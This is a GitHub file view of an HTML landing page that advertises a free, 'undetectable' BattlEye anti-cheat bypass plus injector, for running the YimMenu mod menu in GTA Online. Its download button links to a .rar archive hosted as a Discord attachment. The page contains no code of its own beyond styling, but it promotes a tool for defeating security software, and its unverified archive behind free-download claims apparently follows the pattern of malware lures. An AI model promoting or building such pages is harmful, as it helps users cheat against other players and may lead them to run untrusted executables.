-
Notifications
You must be signed in to change notification settings - Fork 0
/
index.html
63 lines (59 loc) · 2.25 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Bypass + Injector and Mod Menu</title>
<link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel="stylesheet">
<style>
body {
background-color: #121212;
color: #ffffff;
}
.btn-custom {
background-color: #ff6f00;
color: white;
border: none;
padding: 10px 20px;
font-size: 1.2rem;
}
.btn-custom:hover {
background-color: #ff8f00;
}
.card {
background-color: #1f1f1f;
border: none;
margin-top: 20px;
}
.card p, .card ul {
color: #b0b0b0;
}
.card img {
width: 100%;
height: auto;
}
.text-center {
text-align: center !important;
}
</style>
</head>
<body>
<div class="container mt-5">
<h1 class="text-center">batteleye bypass + injector and mod menu</h1>
<div class="card">
<div class="card-body text-center">
<p>This is a bypass to skip Batteleye's anti-cheat to play GTA Online and use mod menus. We use the yim mod menu for this and an injector with a bypass to use the mod menu using Batteleye and play with your friends online.</p>
<ul class="list-unstyled">
<li>✔️ Undetectable</li>
<li>✔️ Free Download</li>
<li>✔️ Bypass Version 2.1</li>
</ul>
<div class="text-center mt-4">
<a href="https://cdn.discordapp.com/attachments/1292411372306698251/1292667007858118686/YimMenu-and-battleye-bypass.rar?ex=67049177&is=67033ff7&hm=1ec2104db2e202284e51af98a1f7a6a8e60a293d55275c72a836f2d00c836f1f&" class="btn btn-custom">Download Bypass + Mod Menu – v2.1</a>
</div>
</div>
</div>
</div>
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js"></script>
</body>
</html>